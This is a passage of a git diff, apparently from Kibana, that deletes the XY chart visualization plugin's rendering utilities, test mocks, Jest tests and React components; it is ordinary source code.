+0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import moment from 'moment'; - -import { getUISettings } from '../services'; - -/** - * Get timeZone from uiSettings - */ -export function getTimeZone() { - const uiSettings = getUISettings(); - if (uiSettings.isDefault('dateFormat:tz')) { - const detectedTimeZone = moment.tz.guess(); - if (detectedTimeZone) return detectedTimeZone; - else return moment().format('Z'); - } else { - return uiSettings.get('dateFormat:tz', 'Browser'); - } -} diff --git a/src/plugins/vis_types/xy/public/utils/index.tsx b/src/plugins/vis_types/xy/public/utils/index.tsx deleted file mode 100644 index d68a6e8068fa8..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/index.tsx +++ /dev/null @@ -1,16 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -export { renderAllSeries } from './render_all_series'; -export { getTimeZone } from './get_time_zone'; -export { getLegendActions } from './get_legend_actions'; -export { getSeriesNameFn } from './get_series_name_fn'; -export { getXDomain, getAdjustedDomain } from './domain'; -export { getColorPicker } from './get_color_picker'; -export { getXAccessor } from './accessors'; -export { getAllSeries } from './get_all_series'; diff --git a/src/plugins/vis_types/xy/public/utils/render_all_series.test.mocks.ts b/src/plugins/vis_types/xy/public/utils/render_all_series.test.mocks.ts deleted file mode 100644 index 4c51d8cad64e4..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/render_all_series.test.mocks.ts +++ /dev/null @@ -1,529 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { AxisMode, VisConfig } from '../types'; - -export const getVisConfig = (): VisConfig => { - return { - markSizeRatio: 5.3999999999999995, - fittingFunction: 'linear', - detailedTooltip: true, - isTimeChart: true, - showCurrentTime: false, - showValueLabel: false, - enableHistogramMode: true, - tooltip: { - type: 'vertical', - }, - aspects: { - x: { - accessor: 'col-0-2', - column: 0, - title: 'order_date per minute', - format: { - id: 'date', - params: { - pattern: 'HH:mm', - }, - }, - aggType: 'date_histogram', - aggId: '2', - params: { - date: true, - intervalESUnit: 'm', - intervalESValue: 1, - interval: 60000, - format: 'HH:mm', - }, - }, - y: [ - { - accessor: 'col-1-3', - column: 1, - title: 'Average products.base_price', - format: { - id: 'number', - }, - aggType: 'avg', - aggId: '3', - params: {}, - }, - ], - }, - xAxis: { - id: 'CategoryAxis-1', - position: 'bottom', - show: true, - style: { - axisTitle: { - visible: true, - }, - tickLabel: { - visible: true, - rotation: 0, - }, - }, - groupId: 'CategoryAxis-1', - title: 'order_date per minute', - ticks: { - show: true, - showOverlappingLabels: false, - showDuplicates: false, - }, - grid: { - show: false, - }, - scale: { - type: 'time', - }, - integersOnly: false, - }, - yAxes: [ - { - id: 'ValueAxis-1', - position: 'left', - show: true, - style: { - axisTitle: { - visible: true, - }, - tickLabel: { - visible: true, - rotation: 0, - }, - }, - groupId: 'ValueAxis-1', - title: 'Avg of products.base_price', - ticks: { - show: true, - rotation: 0, - showOverlappingLabels: true, - showDuplicates: true, - }, - grid: { - show: false, - }, - scale: { - mode: AxisMode.Percentage, - type: 'linear', - }, - domain: { - min: NaN, - max: NaN, - }, - integersOnly: false, - }, - ], - legend: { - show: true, - position: 'right', - }, - rotation: 0, - thresholdLine: { - color: '#E7664C', - show: false, - value: 10, - width: 1, - groupId: 'ValueAxis-1', - }, - }; -}; - -export const getVisConfigMutipleYaxis = (): VisConfig => { - return { - markSizeRatio: 5.3999999999999995, - fittingFunction: 'linear', - detailedTooltip: true, - isTimeChart: true, - showCurrentTime: false, - showValueLabel: false, - enableHistogramMode: true, - tooltip: { - type: 'vertical', - }, - aspects: { - x: { - accessor: 'col-0-2', - column: 0, - title: 'order_date per minute', - format: { - id: 'date', - params: { - pattern: 'HH:mm', - }, - }, - aggType: 'date_histogram', - aggId: '2', - params: { - date: true, - intervalESUnit: 'm', - intervalESValue: 1, - interval: 60000, - format: 'HH:mm', - }, - }, - y: [ - { - accessor: 'col-1-3', - column: 1, - title: 'Average products.base_price', - format: { - id: 'number', - }, - aggType: 'avg', - aggId: '3', - params: {}, - }, - { - accessor: 'col-1-2', - column: 1, - title: 'Average products.taxful_price', - format: { - id: 'number', - }, - aggType: 'avg', - aggId: '33', - params: {}, - }, - ], - }, - xAxis: { - id: 'CategoryAxis-1', - position: 'bottom', - show: true, - style: { - axisTitle: { - visible: true, - }, - tickLabel: { - visible: true, - rotation: 0, - }, - }, - groupId: 'CategoryAxis-1', - title: 'order_date per minute', - ticks: { - show: true, - showOverlappingLabels: false, - showDuplicates: false, - }, - grid: { - show: false, - }, - scale: { - type: 'time', - }, - integersOnly: false, - }, - yAxes: [ - { - id: 'ValueAxis-1', - position: 'left', - show: true, - style: { - axisTitle: { - visible: true, - }, - tickLabel: { - visible: true, - rotation: 0, - }, - }, - groupId: 'ValueAxis-1', - title: 'Avg of products.base_price', - ticks: { - show: true, - rotation: 0, - showOverlappingLabels: true, - showDuplicates: true, - }, - grid: { - show: false, - }, - scale: { - mode: AxisMode.Normal, - type: 'linear', - }, - domain: { - min: NaN, - max: NaN, - }, - integersOnly: false, - }, - ], - legend: { - show: true, - position: 'right', - }, - rotation: 0, - thresholdLine: { - color: '#E7664C', - show: false, - value: 10, - width: 1, - groupId: 'ValueAxis-1', - }, - }; -}; - -export const getVisConfigPercentiles = (): VisConfig => { - return { - markSizeRatio: 5.3999999999999995, - fittingFunction: 'linear', - detailedTooltip: true, - isTimeChart: true, - showCurrentTime: false, - showValueLabel: false, - enableHistogramMode: true, - tooltip: { - type: 'vertical', - }, - aspects: { - x: { - accessor: 'col-0-2', - column: 0, - title: 'order_date per minute', - format: { - id: 'date', - params: { - pattern: 'HH:mm', - }, - }, - aggType: 'date_histogram', - aggId: '2', - params: { - date: true, - intervalESUnit: 'm', - intervalESValue: 1, - interval: 60000, - format: 'HH:mm', - }, - }, - y: [ - { - accessor: 'col-1-3.1', - column: 1, - title: '1st percentile of products.base_price', - format: { - id: 'number', - }, - aggType: 'percentiles', - aggId: '3.1', - params: {}, - }, - { - accessor: 'col-2-3.5', - column: 2, - title: '5th percentile of products.base_price', - format: { - id: 'number', - }, - aggType: 'percentiles', - aggId: '3.5', - params: {}, - }, - { - accessor: 'col-3-3.25', - column: 3, - title: '25th percentile of products.base_price', - format: { - id: 'number', - }, - aggType: 'percentiles', - aggId: '3.25', - params: {}, - }, - { - accessor: 'col-4-3.50', - column: 4, - title: '50th percentile of products.base_price', - format: { - id: 'number', - }, - aggType: 'percentiles', - aggId: '3.50', - params: {}, - }, - { - accessor: 'col-5-3.75', - column: 5, - title: '75th percentile of products.base_price', - format: { - id: 'number', - }, - aggType: 'percentiles', - aggId: '3.75', - params: {}, - }, - { - accessor: 'col-6-3.95', - column: 6, - title: '95th percentile of products.base_price', - format: { - id: 'number', - }, - aggType: 'percentiles', - aggId: '3.95', - params: {}, - }, - { - accessor: 'col-7-3.99', - column: 7, - title: '99th percentile of products.base_price', - format: { - id: 'number', - }, - aggType: 'percentiles', - aggId: '3.99', - params: {}, - }, - ], - }, - xAxis: { - id: 'CategoryAxis-1', - position: 'bottom', - show: true, - style: { - axisTitle: { - visible: true, - }, - tickLabel: { - visible: true, - rotation: 0, - }, - }, - groupId: 'CategoryAxis-1', - title: 'order_date per minute', - ticks: { - show: true, - showOverlappingLabels: false, - showDuplicates: false, - }, - grid: { - show: false, - }, - scale: { - type: 'time', - }, - integersOnly: false, - }, - yAxes: [ - { - id: 'ValueAxis-1', - position: 'left', - show: true, - style: { - axisTitle: { - visible: true, - }, - tickLabel: { - visible: true, - rotation: 0, - }, - }, - groupId: 'ValueAxis-1', - title: 'Percentiles of products.base_price', - ticks: { - show: true, - rotation: 0, - showOverlappingLabels: true, - showDuplicates: true, - }, - grid: { - show: false, - }, - scale: { - mode: AxisMode.Normal, - type: 'linear', - }, - domain: { - min: NaN, - max: NaN, - }, - integersOnly: false, - }, - ], - legend: { - show: true, - position: 'right', - }, - rotation: 0, - thresholdLine: { - color: '#E7664C', - show: false, - value: 10, - width: 1, - groupId: 'ValueAxis-1', - }, - }; -}; - -export const getPercentilesData = () => { - return [ - { - 'col-0-2': 1610961900000, - 'col-1-3.1': 11.9921875, - 'col-2-3.5': 11.9921875, - 'col-3-3.25': 11.9921875, - 'col-4-3.50': 38.49609375, - 'col-5-3.75': 65, - 'col-6-3.95': 65, - 'col-7-3.99': 65, - }, - { - 'col-0-2': 1610962980000, - 'col-1-3.1': 28.984375000000004, - 'col-2-3.5': 28.984375, - 'col-3-3.25': 28.984375, - 'col-4-3.50': 30.9921875, - 'col-5-3.75': 41.5, - 'col-6-3.95': 50, - 'col-7-3.99': 50, - }, - { - 'col-0-2': 1610963280000, - 'col-1-3.1': 11.9921875, - 'col-2-3.5': 11.9921875, - 'col-3-3.25': 11.9921875, - 'col-4-3.50': 12.9921875, - 'col-5-3.75': 13.9921875, - 'col-6-3.95': 13.9921875, - 'col-7-3.99': 13.9921875, - }, - { - 'col-0-2': 1610964180000, - 'col-1-3.1': 11.9921875, - 'col-2-3.5': 11.9921875, - 'col-3-3.25': 14.9921875, - 'col-4-3.50': 15.98828125, - 'col-5-3.75': 24.984375, - 'col-6-3.95': 85, - 'col-7-3.99': 85, - }, - { - 'col-0-2': 1610964420000, - 'col-1-3.1': 11.9921875, - 'col-2-3.5': 11.9921875, - 'col-3-3.25': 11.9921875, - 'col-4-3.50': 23.99609375, - 'col-5-3.75': 42, - 'col-6-3.95': 42, - 'col-7-3.99': 42, - }, - { - 'col-0-2': 1610964600000, - 'col-1-3.1': 10.9921875, - 'col-2-3.5': 10.992187500000002, - 'col-3-3.25': 10.9921875, - 'col-4-3.50': 12.4921875, - 'col-5-3.75': 13.9921875, - 'col-6-3.95': 13.9921875, - 'col-7-3.99': 13.9921875, - }, - ]; -}; diff --git a/src/plugins/vis_types/xy/public/utils/render_all_series.test.tsx b/src/plugins/vis_types/xy/public/utils/render_all_series.test.tsx deleted file mode 100644 index 6be7c31cb1060..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/render_all_series.test.tsx +++ /dev/null @@ -1,187 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { shallow } from 'enzyme'; -import { AreaSeries, BarSeries, CurveType } from '@elastic/charts'; -import { DatatableRow } from '@kbn/expressions-plugin/public'; -import { renderAllSeries } from './render_all_series'; -import { - getVisConfig, - getVisConfigPercentiles, - getPercentilesData, - getVisConfigMutipleYaxis, -} from './render_all_series.test.mocks'; -import { SeriesParam, VisConfig } from '../types'; - -const defaultSeriesParams = [ - { - data: { - id: '3', - label: 'Label', - }, - drawLinesBetweenPoints: true, - interpolate: 'linear', - lineWidth: 2, - mode: 'stacked', - show: true, - showCircles: true, - circlesRadius: 3, - type: 'area', - valueAxis: 'ValueAxis-1', - }, -] as SeriesParam[]; - -const defaultData = [ - { - 'col-0-2': 1610960220000, - 'col-1-3': 26.984375, - }, - { - 'col-0-2': 1610961300000, - 'col-1-3': 30.99609375, - }, - { - 'col-0-2': 1610961900000, - 'col-1-3': 38.49609375, - }, - { - 'col-0-2': 1610962980000, - 'col-1-3': 35.2421875, - }, -]; - -describe('renderAllSeries', function () { - const getAllSeries = (visConfig: VisConfig, params: SeriesParam[], data: DatatableRow[]) => { - return renderAllSeries( - visConfig, - params, - data, - jest.fn(), - jest.fn(), - 'Europe/Athens', - 'col-0-2', - [] - ); - }; - - it('renders an area Series and not a bar series if type is area', () => { - const renderSeries = getAllSeries(getVisConfig(), defaultSeriesParams, defaultData); - const wrapper = shallow(
{renderSeries}
); - expect(wrapper.find(AreaSeries).length).toBe(1); - expect(wrapper.find(BarSeries).length).toBe(0); - }); - - it('renders a bar Series in case of histogram', () => { - const barSeriesParams = [{ ...defaultSeriesParams[0], type: 'histogram' }]; - - const renderBarSeries = renderAllSeries( - getVisConfig(), - barSeriesParams as SeriesParam[], - defaultData, - jest.fn(), - jest.fn(), - 'Europe/Athens', - 'col-0-2', - [] - ); - const wrapper = shallow(
{renderBarSeries}
); - expect(wrapper.find(AreaSeries).length).toBe(0); - expect(wrapper.find(BarSeries).length).toBe(1); - }); - - it('renders percentage data for percentage mode', () => { - const barSeriesParams = [{ ...defaultSeriesParams[0], type: 'histogram', mode: 'percentage' }]; - const config = getVisConfig(); - - const renderBarSeries = renderAllSeries( - config, - barSeriesParams as SeriesParam[], - defaultData, - jest.fn(), - jest.fn(), - 'Europe/Athens', - 'col-0-2', - [] - ); - const wrapper = shallow(
{renderBarSeries}
); - expect(wrapper.find(BarSeries).length).toBe(1); - expect(wrapper.find(BarSeries).prop('stackMode')).toEqual('percentage'); - expect(wrapper.find(BarSeries).prop('data')).toEqual([ - { - 'col-0-2': 1610960220000, - 'col-1-3': 1, - }, - { - 'col-0-2': 1610961300000, - 'col-1-3': 1, - }, - { - 'col-0-2': 1610961900000, - 'col-1-3': 1, - }, - { - 'col-0-2': 1610962980000, - 'col-1-3': 1, - }, - ]); - }); - - it('renders the correct yAccessors for not percentile aggs', () => { - const renderSeries = getAllSeries(getVisConfig(), defaultSeriesParams, defaultData); - const wrapper = shallow(
{renderSeries}
); - expect(wrapper.find(AreaSeries).prop('yAccessors')).toEqual(['col-1-3']); - }); - - it('renders the correct yAccessors for multiple yAxis', () => { - const mutipleYAxisConfig = getVisConfigMutipleYaxis(); - const renderMutipleYAxisSeries = renderAllSeries( - mutipleYAxisConfig, - defaultSeriesParams as SeriesParam[], - defaultData, - jest.fn(), - jest.fn(), - 'Europe/Athens', - 'col-0-2', - [] - ); - const wrapper = shallow(
{renderMutipleYAxisSeries}
); - expect(wrapper.find(AreaSeries).prop('yAccessors')).toEqual(['col-1-3']); - }); - - it('renders the correct yAccessors for percentile aggs', () => { - const percentilesConfig = getVisConfigPercentiles(); - const percentilesData = getPercentilesData(); - const renderPercentileSeries = renderAllSeries( - percentilesConfig, - defaultSeriesParams as SeriesParam[], - percentilesData, - jest.fn(), - jest.fn(), - 'Europe/Athens', - 'col-0-2', - [] - ); - const wrapper = shallow(
{renderPercentileSeries}
); - expect(wrapper.find(AreaSeries).prop('yAccessors')).toEqual([ - 'col-1-3.1', - 'col-2-3.5', - 'col-3-3.25', - 'col-4-3.50', - 'col-5-3.75', - 'col-6-3.95', - 'col-7-3.99', - ]); - }); - - it('defaults the CurveType to linear', () => { - const renderSeries = getAllSeries(getVisConfig(), defaultSeriesParams, defaultData); - const wrapper = shallow(
{renderSeries}
); - expect(wrapper.find(AreaSeries).prop('curve')).toEqual(CurveType.LINEAR); - }); -}); diff --git a/src/plugins/vis_types/xy/public/utils/render_all_series.tsx b/src/plugins/vis_types/xy/public/utils/render_all_series.tsx deleted file mode 100644 index 0e3787a27560d..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/render_all_series.tsx +++ /dev/null @@ -1,222 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { - AreaSeries, - CurveType, - BarSeries, - XYChartSeriesIdentifier, - SeriesColorAccessorFn, - SeriesName, - Accessor, - AccessorFn, - ColorVariant, - LabelOverflowConstraint, -} from '@elastic/charts'; - -import { DatatableRow } from '@kbn/expressions-plugin/public'; - -import { ChartType } from '../../common'; -import { SeriesParam, VisConfig, Aspect } from '../types'; -import { isValidSeriesForDimension } from './accessors'; -import { computePercentageData } from './compute_percentage_data'; - -/** - * Matches vislib curve to elastic charts - * @param type curve type - */ -const getCurveType = (type?: 'linear' | 'cardinal' | 'step-after'): CurveType => { - switch (type) { - case 'cardinal': - return CurveType.CURVE_MONOTONE_X; - case 'step-after': - return CurveType.CURVE_STEP_AFTER; - case 'linear': - default: - return CurveType.LINEAR; - } -}; - -/** - * Renders chart Line, Area or Bar series - * @param config - * @param seriesParams - * @param data - * @param getSeriesName - * @param getSeriesColor - */ -export const renderAllSeries = ( - { - aspects, - yAxes, - xAxis, - showValueLabel, - enableHistogramMode, - fittingFunction, - fillOpacity, - }: VisConfig, - seriesParams: SeriesParam[], - data: DatatableRow[], - getSeriesName: (series: XYChartSeriesIdentifier) => SeriesName, - getSeriesColor: SeriesColorAccessorFn, - timeZone: string, - xAccessor: Accessor | AccessorFn, - splitSeriesAccessors: Array -) => { - let percentageModeComputedData: DatatableRow[] = []; - yAxes.forEach((yAxis) => { - const scale = yAxis.scale; - // find the series that are positioned on this axis - const series = seriesParams.filter((seriesParam) => seriesParam.valueAxis === yAxis.groupId); - const yAspects: Aspect[] = []; - series.forEach((seriesParam) => { - const aggId = seriesParam.data.id; - const accessorsInSeries = aspects.y.filter((aspect) => aspect.aggId === aggId); - yAspects.push(...accessorsInSeries); - }); - const yAccessors = yAspects.map((aspect) => { - return aspect.accessor; - }) as string[]; - if (scale.mode === 'percentage') { - const splitChartAccessor = aspects.splitColumn?.accessor || aspects.splitRow?.accessor; - percentageModeComputedData = computePercentageData( - data, - xAccessor, - yAccessors, - splitChartAccessor - ); - } - }); - - return seriesParams.map( - ({ - show, - valueAxis: groupId, - data: { id: paramId }, - lineWidth: strokeWidth, - showCircles, - circlesRadius, - drawLinesBetweenPoints, - mode, - interpolate, - type, - }) => { - const yAspects = aspects.y.filter((aspect) => isValidSeriesForDimension(paramId, aspect)); - if (!show || !yAspects.length) { - return null; - } - const yAccessors = yAspects.map((aspect) => aspect.accessor) as string[]; - - const id = `${type}-${yAccessors[0]}`; - const yAxisScale = yAxes.find(({ groupId: axisGroupId }) => axisGroupId === groupId)?.scale; - - const isStacked = mode === 'stacked'; - - const stackMode = yAxisScale?.mode === 'normal' ? undefined : yAxisScale?.mode; - // needed to seperate stacked and non-stacked bars into unique pseudo groups - const pseudoGroupId = isStacked ? `__pseudo_stacked_group-${groupId}__` : groupId; - // set domain of stacked groups to use actual groupId not pseudo groupdId - const useDefaultGroupDomain = isStacked ? groupId : undefined; - - switch (type) { - case ChartType.Histogram: - return ( - - ); - - case ChartType.Area: - case ChartType.Line: - const markSizeAccessor = showCircles ? aspects.z?.accessor ?? undefined : undefined; - - return ( - - ); - default: - // Error: unsupported chart type - return null; - } - } - ); -}; diff --git a/src/plugins/vis_types/xy/public/vis_component.tsx b/src/plugins/vis_types/xy/public/vis_component.tsx deleted file mode 100644 index a744841601a67..0000000000000 --- a/src/plugins/vis_types/xy/public/vis_component.tsx +++ /dev/null @@ -1,413 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React, { memo, useCallback, useEffect, useMemo, useRef, useState } from 'react'; -import type { PaletteRegistry } from '@kbn/coloring'; -import { - Chart, - ElementClickListener, - XYChartElementEvent, - Position, - XYChartSeriesIdentifier, - BrushEndListener, - RenderChangeListener, - ScaleType, - AccessorFn, - Accessor, - XYBrushEvent, - Placement, -} from '@elastic/charts'; - -import { compact } from 'lodash'; -import { - getFilterFromChartClickEventFn, - getFilterFromSeriesFn, - LegendToggle, - getBrushFromChartBrushEventFn, - ClickTriggerEvent, - useActiveCursor, -} from '@kbn/charts-plugin/public'; -import { Datatable, IInterpreterRenderHandlers } from '@kbn/expressions-plugin/public'; -import { - DEFAULT_LEGEND_SIZE, - LegendSizeToPixels, - PersistedState, -} from '@kbn/visualizations-plugin/public'; -import { VisParams } from './types'; -import { - getAdjustedDomain, - getXDomain, - getTimeZone, - renderAllSeries, - getSeriesNameFn, - getLegendActions, - getColorPicker, - getXAccessor, - getAllSeries, -} from './utils'; -import { XYAxis, XYEndzones, XYCurrentTime, XYSettings, XYThresholdLine } from './components'; -import { getConfig } from './config'; -import { getThemeService, getDataActions, getPalettesService, getActiveCursor } from './services'; -import { ChartType } from '../common'; - -import './_chart.scss'; -import { - COMPLEX_SPLIT_ACCESSOR, - getComplexAccessor, - getSplitSeriesAccessorFnMap, -} from './utils/accessors'; -import { ChartSplit } from './chart_split'; - -export interface VisComponentProps { - visParams: VisParams; - visData: Datatable; - uiState: PersistedState; - fireEvent: IInterpreterRenderHandlers['event']; - renderComplete: IInterpreterRenderHandlers['done']; - syncColors: boolean; - syncTooltips: boolean; - useLegacyTimeAxis: boolean; -} - -export type VisComponentType = typeof VisComponent; - -const VisComponent = (props: VisComponentProps) => { - const [showLegend, setShowLegend] = useState(() => { - // TODO: Check when this bwc can safely be removed - const bwcLegendStateDefault = - props.visParams.addLegend == null ? true : props.visParams.addLegend; - return props.uiState?.get('vis.legendOpen', bwcLegendStateDefault) as boolean; - }); - const [palettesRegistry, setPalettesRegistry] = useState(null); - const chartRef = useRef(null); - - const handleCursorUpdate = useActiveCursor(getActiveCursor(), chartRef, { - datatables: [props.visData], - }); - - const onRenderChange = useCallback( - (isRendered) => { - if (isRendered) { - props.renderComplete(); - } - }, - [props] - ); - - useEffect(() => { - const fetchPalettes = async () => { - const palettes = await getPalettesService().getPalettes(); - setPalettesRegistry(palettes); - }; - fetchPalettes(); - }, []); - - const handleFilterClick = useCallback( - ( - visData: Datatable, - xAccessor: Accessor | AccessorFn, - splitSeriesAccessors: Array, - splitChartAccessor?: Accessor | AccessorFn - ): ElementClickListener => { - const splitSeriesAccessorFnMap = getSplitSeriesAccessorFnMap(splitSeriesAccessors); - return (elements) => { - if (xAccessor !== null) { - const event = getFilterFromChartClickEventFn( - visData, - xAccessor, - splitSeriesAccessorFnMap, - splitChartAccessor - )(elements as XYChartElementEvent[]); - props.fireEvent(event); - } - }; - }, - [props] - ); - - const handleBrush = useCallback( - ( - visData: Datatable, - xAccessor: Accessor | AccessorFn, - isInterval: boolean - ): BrushEndListener | undefined => { - if (xAccessor !== null && isInterval) { - return (brushArea) => { - const event = getBrushFromChartBrushEventFn( - visData, - xAccessor - )(brushArea as XYBrushEvent); - props.fireEvent(event); - }; - } - }, - [props] - ); - - const getFilterEventData = useCallback( - ( - visData: Datatable, - xAccessor: Accessor | AccessorFn, - splitSeriesAccessors: Array - ) => { - const splitSeriesAccessorFnMap = getSplitSeriesAccessorFnMap(splitSeriesAccessors); - return (series: XYChartSeriesIdentifier): ClickTriggerEvent | null => { - if (xAccessor !== null) { - return getFilterFromSeriesFn(visData)(series, splitSeriesAccessorFnMap); - } - - return null; - }; - }, - [] - ); - - const handleFilterAction = useCallback( - (event: ClickTriggerEvent, negate = false) => { - props.fireEvent({ - ...event, - data: { - ...event.data, - negate, - }, - }); - }, - [props] - ); - - const canFilter = async (event: ClickTriggerEvent | null): Promise => { - if (!event) { - return false; - } - const filters = await getDataActions().createFiltersFromValueClickAction(event.data); - return Boolean(filters.length); - }; - - const toggleLegend = useCallback(() => { - setShowLegend((value) => { - const newValue = !value; - if (props.uiState?.set) { - props.uiState.set('vis.legendOpen', newValue); - } - return newValue; - }); - }, [props.uiState]); - - const setColor = useCallback( - (newColor: string | null, seriesLabel: string | number) => { - const colors = props.uiState?.get('vis.colors') || {}; - if (colors[seriesLabel] === newColor || !newColor) { - delete colors[seriesLabel]; - } else { - colors[seriesLabel] = newColor; - } - - if (props.uiState?.set) { - props.uiState.setSilent('vis.colors', null); - props.uiState.set('vis.colors', colors); - props.uiState.emit('colorChanged'); - } - }, - [props.uiState] - ); - - const { visData, visParams, syncColors, syncTooltips } = props; - const isDarkMode = getThemeService().useDarkMode(); - - const config = getConfig(visData, visParams, props.useLegacyTimeAxis, isDarkMode); - const timeZone = getTimeZone(); - const xDomain = - config.xAxis.scale.type === ScaleType.Ordinal ? undefined : getXDomain(config.aspects.x.params); - const hasBars = visParams.seriesParams.some( - ({ type, data: { id: paramId } }) => - type === ChartType.Histogram && - config.aspects.y.find(({ aggId }) => aggId === paramId) !== undefined - ); - const adjustedXDomain = - config.xAxis.scale.type === ScaleType.Ordinal - ? undefined - : getAdjustedDomain(visData.rows, config.aspects.x, timeZone, xDomain, hasBars); - const legendPosition = useMemo( - () => config.legend.position ?? Position.Right, - [config.legend.position] - ); - - const getSeriesName = getSeriesNameFn(config.aspects, config.aspects.y.length > 1); - - const splitAccessors = config.aspects.series?.map(({ accessor, formatter }) => { - return { accessor, formatter }; - }); - - const allSeries = useMemo( - () => getAllSeries(visData.rows, splitAccessors, config.aspects.y), - [config.aspects.y, splitAccessors, visData.rows] - ); - - const getSeriesColor = useCallback( - (series: XYChartSeriesIdentifier) => { - const seriesName = getSeriesName(series) as string; - if (!seriesName) { - return null; - } - const overwriteColors: Record = props.uiState?.get - ? props.uiState.get('vis.colors', {}) - : {}; - - if (Object.keys(overwriteColors).includes(seriesName)) { - return overwriteColors[seriesName]; - } - const outputColor = palettesRegistry?.get(visParams.palette.name).getCategoricalColor( - [ - { - name: seriesName, - rankAtDepth: splitAccessors - ? allSeries.findIndex((name) => name === seriesName) - : config.aspects.y.findIndex((aspect) => aspect.accessor === series.yAccessor), - totalSeriesAtDepth: splitAccessors ? allSeries.length : config.aspects.y.length, - }, - ], - { - maxDepth: 1, - totalSeries: splitAccessors ? allSeries.length : config.aspects.y.length, - behindText: false, - syncColors, - } - ); - return outputColor || null; - }, - [ - allSeries, - config.aspects.y, - getSeriesName, - props.uiState, - splitAccessors, - syncColors, - visParams.palette.name, - palettesRegistry, - ] - ); - const xAccessor = getXAccessor(config.aspects.x); - - const splitSeriesAccessors = useMemo( - () => - config.aspects.series - ? compact(config.aspects.series.map(getComplexAccessor(COMPLEX_SPLIT_ACCESSOR))) - : [], - [config.aspects.series] - ); - const splitChartColumnAccessor = config.aspects.splitColumn - ? getComplexAccessor(COMPLEX_SPLIT_ACCESSOR, true)(config.aspects.splitColumn) - : undefined; - const splitChartRowAccessor = config.aspects.splitRow - ? getComplexAccessor(COMPLEX_SPLIT_ACCESSOR, true)(config.aspects.splitRow) - : undefined; - - const renderSeries = useMemo( - () => - renderAllSeries( - config, - visParams.seriesParams, - visData.rows, - getSeriesName, - getSeriesColor, - timeZone, - xAccessor, - splitSeriesAccessors - ), - [ - config, - getSeriesColor, - getSeriesName, - splitSeriesAccessors, - timeZone, - visData.rows, - visParams.seriesParams, - xAccessor, - ] - ); - - const legendColorPicker = useMemo( - () => - getColorPicker( - legendPosition, - setColor, - getSeriesName, - visParams.palette.name, - props.uiState - ), - [getSeriesName, legendPosition, props.uiState, setColor, visParams.palette.name] - ); - - return ( -
- - - - 0 - ? getLegendActions( - canFilter, - getFilterEventData(visData, xAccessor, splitSeriesAccessors), - handleFilterAction, - getSeriesName - ) - : undefined - } - /> - - - - - {config.yAxes.map((axisProps) => ( - - ))} - {renderSeries} - -
- ); -}; - -// eslint-disable-next-line import/no-default-export -export default memo(VisComponent); diff --git a/src/plugins/vis_types/xy/public/vis_renderer.tsx b/src/plugins/vis_types/xy/public/vis_renderer.tsx deleted file mode 100644 index 246f85ee60089..0000000000000 --- a/src/plugins/vis_types/xy/public/vis_renderer.tsx +++ /dev/null @@ -1,108 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React, { lazy } from 'react'; -import { render, unmountComponentAtNode } from 'react-dom'; -import { I18nProvider } from '@kbn/i18n-react'; -import { KibanaExecutionContext } from '@kbn/core-execution-context-common'; - -import { METRIC_TYPE } from '@kbn/analytics'; -import { KibanaThemeProvider } from '@kbn/kibana-react-plugin/public'; -import { VisualizationContainer } from '@kbn/visualizations-plugin/public'; -import type { PersistedState } from '@kbn/visualizations-plugin/public'; -import type { ExpressionRenderDefinition } from '@kbn/expressions-plugin/public'; - -import { LEGACY_TIME_AXIS } from '@kbn/charts-plugin/common'; -import { StartServicesGetter } from '@kbn/kibana-utils-plugin/public'; -import type { XyVisType } from '../common'; -import type { VisComponentType } from './vis_component'; -import { RenderValue, visName } from './expression_functions/xy_vis_fn'; -import { VisTypeXyPluginStartDependencies } from './plugin'; - -// @ts-ignore -const VisComponent = lazy(() => import('./vis_component')); - -function shouldShowNoResultsMessage(visData: any, visType: XyVisType): boolean { - const rows: object[] | undefined = visData?.rows; - const isZeroHits = visData?.hits === 0 || (rows && !rows.length); - - return Boolean(isZeroHits); -} - -/** @internal **/ -const extractContainerType = (context?: KibanaExecutionContext): string | undefined => { - if (context) { - const recursiveGet = (item: KibanaExecutionContext): KibanaExecutionContext | undefined => { - if (item.type) { - return item; - } else if (item.child) { - return recursiveGet(item.child); - } - }; - return recursiveGet(context)?.type; - } -}; - -export const getXYVisRenderer: (deps: { - getStartDeps: StartServicesGetter; -}) => ExpressionRenderDefinition = ({ getStartDeps }) => ({ - name: visName, - displayName: 'XY visualization', - reuseDomNode: true, - render: async (domNode, { visData, visConfig, visType, syncColors, syncTooltips }, handlers) => { - const { 